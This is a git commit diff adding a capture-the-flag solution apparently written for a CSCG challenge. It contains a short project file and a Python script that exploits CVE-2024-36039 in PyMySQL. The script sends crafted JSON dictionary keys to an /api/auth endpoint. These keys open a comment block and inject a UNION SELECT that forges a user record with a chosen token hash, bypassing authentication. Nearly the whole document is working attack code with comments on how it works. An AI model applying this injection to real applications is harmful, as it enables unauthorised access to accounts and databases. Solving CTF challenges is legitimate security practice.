cscg is loooong

This commit is contained in:
2026-03-18 05:59:37 +01:00
parent 0c1e63fb3a
commit 7ac813dc0c
1109 changed files with 14511 additions and 0 deletions

View File

@@ -0,0 +1 @@
3.13

View File

@@ -0,0 +1,7 @@
[project]
name = "exploit"
version = "0.1.0"
description = "Add your description here"
readme = "README.md"
requires-python = ">=3.13"
dependencies = []

View File

@@ -0,0 +1,31 @@
import requests
import hashlib
BASE_URL = "https://usylj6lnspfp6iquvda5y7tlxu-5000-ass.challenge.cscg.live/"
TOKEN = "crazypassword"
def password_hash(password: str) -> str:
return hashlib.sha256(password.encode()).hexdigest()
token_hash = password_hash(TOKEN)
print(f"[*] Hash: {token_hash}")
# 1. First key: Parses as a User object, bypasses quotes, and opens the comment block.
# Regex requires: 4-10 chars, 7+ chars, 2 uppercase chars.
key_open = "fn/*,1234567,XX"
# 2. Second key: Because of CVE-2024-36039, PyMySQL does NOT escape dict keys!
# Python wraps it in double quotes, but MariaDB will ignore the opening quote
# because it falls inside our /* */ comment block.
key_payload = "*/ PI()}) UNION SELECT 1,'hacker','" + token_hash + "','us',1 #"
# Python dicts preserve order!
# fn/* comes first, opening the comment.
# The payload comes second, closing the comment and injecting.
r = requests.post(f"{BASE_URL}/api/auth", json=[{
key_open: "irrelevant",
key_payload: "also irrelevant",
"token": TOKEN
}])
print("[*] Auth:", r.json())